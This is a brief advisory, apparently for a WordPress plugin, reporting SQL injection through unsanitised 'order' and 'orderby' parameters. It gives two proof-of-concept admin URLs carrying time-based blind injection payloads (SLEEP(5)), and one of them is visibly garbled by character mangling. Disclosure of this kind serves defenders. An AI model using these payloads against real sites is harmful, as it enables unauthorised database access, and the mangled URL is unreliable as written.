The plugin does not sanitise and escape the order and orderby parameters before using them in a SQL statement, leading to a SQL injection
https://example.com/wp-admin/admin.php?page=tp_editor&action;=filter-byℴ=+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b) https://example.com/wp-admin/admin.php?page=tp_editor&action;=filter-by&orderby;=lang+AND+(SELECT+42+FROM+(SELECT(SLEEP(5)))b)